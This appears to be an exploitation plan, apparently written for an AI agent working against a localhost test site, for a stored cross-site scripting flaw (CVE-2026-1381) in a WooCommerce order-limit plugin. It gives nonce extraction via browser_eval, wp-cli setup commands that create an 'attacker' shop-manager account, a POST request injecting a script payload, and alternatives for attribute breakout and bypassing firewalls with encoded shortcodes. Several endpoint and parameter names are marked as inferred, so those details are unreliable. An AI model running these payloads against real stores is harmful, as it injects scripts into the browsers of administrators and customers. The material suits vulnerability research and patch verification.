Order Minimum/Maximum Amount Limits for WooCommerce <= 4.6.8 - Authenticated (Shop Manager+) Stored Cross-Site Scripting via Hide Add to Cart Content Fields

This research plan outlines the technical steps to analyze and exploit CVE-2026-1381, a Stored Cross-Site Scripting (XSS) vulnerability in the "Order Minimum/Maximum Amount Limits for WooCommerce" plugin.

---

1. Vulnerability Summary

The vulnerability exists in the plugin's handling of the "Hide Add to Cart Content" settings. Authenticated users with Shop Manager (or higher) permissions can inject arbitrary scripts into this field. Because the plugin fails to sanitize this input upon saving or escape it upon output, the script is stored in the database and executed in the browser of any user (including administrators and customers) viewing a page where the "Add to Cart" button is hidden due to order limit restrictions.

This is particularly critical in WordPress Multisite environments or installations where DISALLOW_UNFILTERED_HTML is enabled, as these configurations are intended to prevent even administrative users from injecting executable scripts.

2. Attack Vector Analysis

• Vulnerable Endpoint: wp-admin/admin-ajax.php (if using AJAX settings) or more likely the WooCommerce settings handler at wp-admin/admin.php?page=wc-settings.
• Vulnerable Parameter: Likely alg_wc_ommal_hide_add_to_cart_content (inferred from plugin slug ommal).
• Required Role: Shop Manager or Administrator.
• Preconditions:
  1. The "Hide Add to Cart" feature must be enabled in the plugin settings.
  2. A condition must be met on the frontend that triggers the "Hide Add to Cart" logic (e.g., the current cart total is below the minimum required amount).

3. Code Flow (Inferred)

1. Input: A Shop Manager navigates to WooCommerce > Settings > Order Min/Max Amount.
2. Storage: The user submits the form. The plugin receives the POST data and calls update_option() for the key alg_wc_ommal_hide_add_to_cart_content without using wp_kses() or sanitize_text_field().
3. Trigger: A frontend user visits a product page.
4. Logic: The plugin's frontend class (likely hooked to woocommerce_single_product_summary) checks if alg_wc_ommal_enabled is 'yes' and if the order limits are violated.
5. Output: If limits are violated and the "Hide Add to Cart" option is active, the plugin retrieves the stored option and echoes it directly:
   echo get_option('alg_wc_ommal_hide_add_to_cart_content'); // Sink

4. Nonce Acquisition Strategy

Since this vulnerability requires Shop Manager authentication, the agent must simulate a logged-in session.

1. Login: Use wp_cli to ensure a Shop Manager user exists and log in via the browser.
2. Navigate: Navigate to the WooCommerce settings page for this plugin.
   • Target URL: /wp-admin/admin.php?page=wc-settings&tab=alg_wc_ommal (inferred tab name).
3. Extraction:
   • WooCommerce settings pages use a standard WordPress nonce field.
   • Use browser_eval to extract the _wpnonce value from the form:
     browser_eval("document.querySelector('#mainform input[name=_wpnonce]')?.value")
4. Identify Field: Use browser_eval to find the exact name attribute of the textarea/input for "Hide Add to Cart Content".

5. Exploitation Strategy

Step 1: Enable the Feature

The plugin must be active and the limits must be enabled.

wp option update alg_wc_ommal_enabled "yes"
wp option update alg_wc_ommal_min_amount "100" # Set a high min to trigger the "hide" logic

Step 2: Inject the Payload

Send a POST request to save the malicious script.

• URL: http://localhost:8080/wp-admin/admin.php?page=wc-settings&tab=alg_wc_ommal
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Parameters:
  • _wpnonce: [EXTRACTED_NONCE]
  • save: Save changes
  • alg_wc_ommal_hide_add_to_cart_content: <script>alert(document.domain);</script>
  • alg_wc_ommal_hide_add_to_cart_enabled: yes

Step 3: Trigger Output

Navigate to a product page as an unauthenticated user or an admin. Since the cart is empty (amount = 0) and the minimum is 100, the "Hide Add to Cart" logic will fire.

• URL: /product/any-product-slug/

6. Test Data Setup

1. Plugin Setup:

   wp plugin install order-minimum-amount-for-woocommerce --version=4.6.8 --activate
   

2. WooCommerce Setup: Ensure a product exists.

   wp post create --post_type=product --post_title="Test Product" --post_status=publish
   # Note: WooCommerce needs 'product' type to be registered. 
   # If WC is not configured, we may need to run the WC setup wizard via CLI.
   

3. User Setup:

   wp user create attacker attacker@example.com --role=shop_manager --user_pass=password
   

7. Expected Results

• Upon visiting the product page, a browser alert box displaying the document domain should appear.
• The HTML source code of the product page should contain the raw <script>alert(document.domain);</script> string where the "Add to Cart" button would normally be.

8. Verification Steps

1. Check Database:

   wp option get alg_wc_ommal_hide_add_to_cart_content
   

   Expectation: The output contains the literal <script> tag.
2. Verify Output (CLI):
   Use http_request to fetch the product page and grep for the payload.

   # (Metaphorical)
   response = http_request("GET", "/product/test-product/")
   assert "<script>alert(document.domain);</script>" in response.body
   

9. Alternative Approaches

• Attribute Injection: If the payload is rendered inside an attribute (e.g., a placeholder or value), use:
  "><script>alert(1)</script>
• Shortcode injection: Check if the plugin processes shortcodes in that field. If so, an attacker might be able to use [base64_decode] or similar to bypass simple WAFs if present.
• Admin-only trigger: If the settings page itself doesn't escape the value when reloading the settings UI, the Shop Manager can target the Administrator by simply saving the payload and waiting for the Admin to check the plugin settings.